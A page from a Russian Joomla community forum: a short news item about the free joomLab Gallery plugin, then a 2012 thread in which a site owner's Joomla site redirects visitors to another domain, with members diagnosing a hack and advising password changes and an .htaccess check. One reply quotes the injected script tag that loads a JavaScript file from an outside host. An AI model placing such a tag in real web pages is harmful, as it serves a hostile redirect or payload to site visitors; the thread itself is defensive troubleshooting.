Новости Joomla

joomLab Gallery - плагин галереи изображений для Joomla

👩‍💻 joomLab Gallery - плагин галереи изображений для Joomla.Плагин joomLab Gallery позволит Вам добавлять в любой материал неограниченное количество галерей, а главное удобно управлять файлами и эффектами в каждой галерее.Плагин использует популярны скрипты Swiper.js и FancyBox. Первый для крутой организации и эффектов галерей, а второй для красивого и функционального показа оригинальных изображений на Вашем сайте.На данный момент плагин имеет 10 макетов вывода - это 10 различных эффектов галерей и Вы можете совмещать все 10 в 1 материале.Плагин позволяет гибко настраивать индивидуально каждую галерею в материале. Вы можете выбрать макет, эффекты и даже можете управлять функциями всплывающего окна изображения.Недостатки.Такой вид реализации не предусматривает выбор изображения на сервере. Т.е. Вы не можете выбрать уже добавленное фото, только загружать заново. Плагин не предоставляет возможности доступа к медиа-менеджеру.Плагин бесплатный. Разработчик - участник нашего сообщества Александр Новиков (@pro-portal).Страница расширения@joomlafeed#joomla #расширения

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla Ну что, интересная инициатива от...

Готовлю большой выпуск, включающий интервью с участниками Joomla 🖨Ну что, интересная инициатива от @webtolkru в виде интервью с разными участниками весьма меня увлекла. Я, вооружившись данным примером, решил подготовить выпуск для NorrNext (@norrnext) и экстраполировал идею на международный масштаб. Теперь готовлю эксклюзивный выпуск с участниками Joomla сообщества со всего мира, которые, в той или иной мере, внесли свой вклад в развитие и популяризацию системы. Будут беседы с людьми из разных стран и фото с юбилейной символикой 📸Работа в процессе 👆 📝О результатах оповещу отдельно.

• 8 Ответов
  • 2165 Просмотров
*

boris1782

• Захожу иногда
  • 56
  • 0 / 0
Ребята просто номер, не знаю почему, думал может из за того что ловил трояна, но на другом компе тоже самое! Открываю сайт mosforpost.ru ни с того ни с сего! Что может быть?
« Последнее редактирование: 31.12.2012, 20:41:42 от boris1782 »
*

NortonFox

• Захожу иногда
  • 441
  • 43 / 0
Нормально открывается не куда не переадресовывает.
Я знаю только то, что ничего не знаю
*

evgen777

• Давно я тут
  • 657
  • 62 / 2
Вот в конце страницы
Код
<script src="http://kinoshkaxa.changeip.name/rsize.js"></script>
Вас ломанули по ходу дела. Скачайте ЭТОТ скрипт, проверьте им хостинг на наличие Shell. Смените пароли от FTP, админки Joomla
Разработка, доработка расширений для Joomla!
*

boris1782

• Захожу иногда
  • 56
  • 0 / 0
Спасибо! Ща попробую!  просто ввожу url в поисковую строку сайт открывается а вот Не открывается через поисковики, например в Яндекс "двери форпост отзывы" на 9 месте мой сайт, кликаю и опа ... сного http://site.portrelay.com/ Жесть!
*

boris1782

• Захожу иногда
  • 56
  • 0 / 0
evgen777 а вы бы не могли помочь найти эту утечку? Отблагодарю конечно!
*

evgen777

• Давно я тут
  • 657
  • 62 / 2
доступ даете? напишите в личку
*

boris1782

• Захожу иногда
  • 56
  • 0 / 0
Отписал
*

draff

• Гуру
  • 5801
  • 434 / 7
  • ищу работу
просто ввожу url в поисковую строку сайт открывается а вот Не открывается через поисковики, например в Яндекс "двери форпост отзывы" на 9 месте мой сайт, кликаю и опа ... сного http://site.portrelay.com/
.htaccess проверяй, или залей стандартный
*

evgen777

• Давно я тут
  • 657
  • 62 / 2
Заказ принял  ^-^
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться

Автоматическое сжатие фото при загрузке на сайт

Автор Amerikana

Ответов: 13
Просмотров: 5016
Последний ответ 30.06.2022, 11:52:23
от Nikita2705
Мультиязычность. При включении плагина "система - фильтр языков" сайт падает

Автор yuraok

Ответов: 10
Просмотров: 6760